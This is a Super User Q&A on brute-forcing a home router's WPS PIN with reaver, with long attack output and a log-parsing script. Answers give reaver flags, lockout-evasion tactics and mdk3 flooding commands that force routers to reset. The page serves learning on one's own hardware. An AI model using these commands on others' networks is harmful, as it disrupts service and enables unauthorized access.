
Why is reaver not guessing the correct PIN?

Super User Asked by Creative Magic on December 13, 2021

I’m learning about network security. This time I’m trying to pen-test my router by exploiting WPS on my router.

Here’s my router’s stats


BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
5C:03:39:40:33:FC    1  -25  2.0  No             W04_5C03394033FC

The power dBm is really high because the router and the network adapter are right next to each other 🙂

I’ve set my router’s WPS PIN to 12345670. I didn’t want to waste time on eventually getting the right PIN, I just wanted to see what happens when I get the right PIN.

I’ve set my adapter into monitor mode and launched reaver with a command:
reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon

The console output (I let it run for ~20 seconds):


root@kali:~# reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon -O /root/Desktop/Dumps/rever_test

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from 5C:03:39:40:33:FC
[+] Received beacon from 5C:03:39:40:33:FC
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2020-07-23 10:19:40 (0 seconds/pin)
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

It’s saying it’s trying the PIN, but nothing comes out of it. I’ve tested if the WPS got locked, but it wasn’t. I’m not sure what the problem is, I’d appreciate some insight as to why this might happen.

I’m running this test on Kali, adapter supports monitor mode and injection.

2 Answers

Short answer:

You need to run reaver with a more sophisticated set of rules:

reaver -i wlan0 -c 1 -b TARGET_ROUTER_MAC -vv -L -N -d 15 -T .5 -r 3:20

You will lock the router after 3-4 tries anyway. Changing your adapter's MAC after 1-2 attempts won't help.

You'll need to reset the router to reset the locked state.
You can do that by running these 5 operations (you'll need to open 5 new terminal windows and run them all at once) Source:

  1. mdk3 monX a -a xx:xx:xx:xx:xx:xx -m
  2. mdk3 monX m -t xx:xx:xx:xx:xx:xx
  3. mdk3 monX d -b blacklist -c X
  4. mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X
  5. wash -i monX -C

This won't work on all routers. But it's worth a try.


Longer version:

I had to dig for a while to get to the bottom of things.
Asked a few friends if they had old routers laying around so I had more stuff to work with.

In total I've done tests with 7 different routers. Their chip sets were:

  • AtherosC
  • RealtekS
  • RalinkTe
  • Broadcom
  • One Buffalo router came back as Unknown

Some of the routers had WPS 1.0 and some WPS 2.0.

My adapter was a Panda PAU05, with a chip set that supports injection. Injection success was 94% to 100%.

NOTE: new PAU05 adapters on Amazon are sold with a different chip set that doesn't support injection (Chipset RT5372). Source

I didn't test for packet drop-off on weaker signals. All the routers were on my desk, pretty much right next to the adapter. So the signal is way better than you might get normally, but for my test it didn't matter.

So, running the test with the command I've posted originally didn't get me anywhere. I left it running for ~40 min. while eating lunch and I could see it tried the second PIN, but it was basically ignored by all routers.

Digging more I've decided to try different settings. To appear more "human", I've tried adding timeouts to different steps of the process. The good news - I was getting somewhere with my tests. But it took ~40-70 seconds for one PIN to be tested. With a total possible 11000 combinations of PINs, it would take up to ~9 days to hack. But probably closer to 4-5 days since you might get the right combination sooner.

But the problem was that I actually got locked out of the router after 3-4 attempts! (WPS 2.0)
I've tried on a different router with WPS 1.0 and got locked out after ~20 attempts.

You'll know you're locked out because reaver will try to use the very first PIN, 12345670, again. Also, if you run wash -i YOUR_ADAPTER_INTERFACE you'll see the router is locked.

OK, so maybe it's because the client is trying too many times? Or maybe it's because I should change my MAC to mimic a real user? I've logged in with a different WiFi card to that router and changed my MAC to that of a "real user". Still got locked out after a few attempts.

So maybe I should make a script that would change my MAC to a random one every time I try a PIN? No, still got locked out.

After resetting my routers manually a whole bunch of times, I thought it wouldn't work in a real-life situation like that. So how would a hacker exploit this? Is WPS finally safe?

After digging in Kali forums I found a way to reset a router by spamming it until it would reset. Since all the routers I tested were old routers that my friends had before they upgraded, they were all susceptible to resetting. Although the original forum post said it might not always work.

So I wrote a new script that would basically run reaver with longer delays to appear human, check when reaver would try to use the starting PIN, reset the router, and do it all over again.

I've later re-written the script to use a PIN from crunch - a password generating tool - and run reaver with a -p PIN flag. Then I ran crunch with a pattern where the right PIN was the very first one (you can do that with a pattern option and providing only one character for generation in the last slot of the pattern). Basically it takes a ton of time to redo the tests again and make sure it all starts from an initial point, so I just wanted to see the final result.

Well, it worked. But the attack is super obvious even if you don't analyze the logs - every once in a while your router would start kicking you off and restart.

Overall I'm still going to perform more tests and see if some steps can change to make more use of tools like reaver or bully.

I'll mark my answer as the right one because I got to the desired result, but I'm not satisfied with the performance. I would really like to be able to get access in ~10 minutes and not ~2 weeks. So I'll gladly accept a different answer if a better way is shown.


It's common sense, but just in case, hacking other people's network, restarting their routers and kicking people off etc. is illegal in many countries.
It's great to learn about security, but if you use it offensively to other people - it's on you.

Answered by Creative Magic on December 13, 2021

The router you are using has WPS patched in the firmware. These attacks were mainly successful with WPS V1.0.

There are a couple of things you can still try.

  1. This router may be using a MAC lock; try randomizing the MAC address and see if it's the wireless adapter that has been locked out from attempts.

  2. Disable NACK in reaver

  3. Try wpspixie from within reaver

Depending on the card and drivers in use, reaver doesn't always show locked access points correctly. My Ralink card comes to mind... (Timeouts after EAPOL START requests are a good indicator of this.)

You can try using wifite (depending on Kali version) to see if it shows your router locked; some of my cards that do not show the AP locked in reaver will display correctly in wifite. It really depends on the card and drivers in use.

Edit: depending on the version of Kali (I'm talking a couple years ago) reaver wouldn't catch responses correctly without airodump-ng running simultaneously. This caveat seems to be fixed in newer versions, but it may be worth a shot to try.

Answered by Tim_Stewart on December 13, 2021
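Both answers point at the same two symptoms in the question's output: reaver keeps "re-trying last pin" with the very first PIN (the accepted answer's sign of a locked AP) and the later attempts end in "Receive timeout occurred" after EAPOL START (Tim_Stewart's indicator). The parser below, added here as an illustration and not code from either answer or from the reaver project, reads reaver's console output in the format quoted above, splits it into per-PIN attempts and summarizes those indicators. The sample log is a constructed, shortened copy of the question's output (same BSSID and ESSID); the "Received M3 message" line is assumed from reaver's normal output and does not occur in the page's log, which is exactly the point: every attempt stalls after M2.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a shortened copy of the reaver output quoted in the
# question, keeping one attempt of each shape that appears there.
SAMPLE_LOG = """\
[+] Waiting for beacon from 5C:03:39:40:33:FC
[+] Received beacon from 5C:03:39:40:33:FC
[+] Trying pin "12345670"
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
"""

PIN_RE = re.compile(r'\[\+\] Trying pin "(\d{8})"')
FAIL_RE = re.compile(r'\[!\] WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)')


@dataclass
class Attempt:
    pin: str
    identity_rounds: int = 0    # identity request/response pairs before M1
    m1_received: int = 0        # "Received M1 message" lines in this attempt
    m2_sent: bool = False       # reaver answered the AP's M1 with M2
    m3_received: bool = False   # assumed reaver line; absent from the page's log
    nacks_sent: int = 0         # "Sending WSC NACK" lines
    timeouts: int = 0           # "Receive timeout occurred" lines
    fail_code: Optional[str] = None  # reaver's failure code, e.g. 0x03


def parse_reaver_log(text: str) -> List[Attempt]:
    """Split reaver console output into one Attempt per 'Trying pin' line."""
    attempts: List[Attempt] = []
    cur: Optional[Attempt] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PIN_RE.match(line)
        if m:
            cur = Attempt(pin=m.group(1))
            attempts.append(cur)
            continue
        if cur is None:
            continue  # banner and beacon lines before the first attempt
        if line == "[+] Received identity request":
            cur.identity_rounds += 1
        elif line == "[+] Received M1 message":
            cur.m1_received += 1
        elif line == "[+] Sending M2 message":
            cur.m2_sent = True
        elif line == "[+] Received M3 message":
            cur.m3_received = True
        elif line == "[+] Sending WSC NACK":
            cur.nacks_sent += 1
        elif line == "[!] WARNING: Receive timeout occurred":
            cur.timeouts += 1
        else:
            f = FAIL_RE.match(line)
            if f:
                cur.fail_code = f.group(1)
    return attempts


def summarize(attempts: List[Attempt]) -> dict:
    """Aggregate the lock indicators both answers describe."""
    pins = [a.pin for a in attempts]
    last = attempts[-1] if attempts else None
    return {
        "attempts": len(attempts),
        "distinct_pins": len(set(pins)),
        "failed_0x03": sum(1 for a in attempts if a.fail_code == "0x03"),
        "reached_m3": sum(1 for a in attempts if a.m3_received),
        "timeouts": sum(a.timeouts for a in attempts),
        # Accepted answer: reaver never advances past the first PIN.
        "stuck_on_one_pin": len(attempts) > 1 and len(set(pins)) == 1,
        # Tim_Stewart's answer: the run ends in EAPOL START receive timeouts.
        "ended_in_timeouts": bool(last and last.fail_code is None and last.timeouts > 0),
    }


if __name__ == "__main__":
    parsed = parse_reaver_log(SAMPLE_LOG)
    for a in parsed:
        print(a)
    print(summarize(parsed))
```

Run against the question's full output, the summary shows the same picture as the sample: one PIN, every completed attempt ending in code 0x03 after the AP answers M2 with a second M1 instead of M3, and the final attempt stalling on EAPOL START timeouts. The PIN was therefore never actually evaluated by the router, which is consistent with the answers' reading that the AP is rejecting or rate-limiting the WPS exchange rather than reaver guessing wrong.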
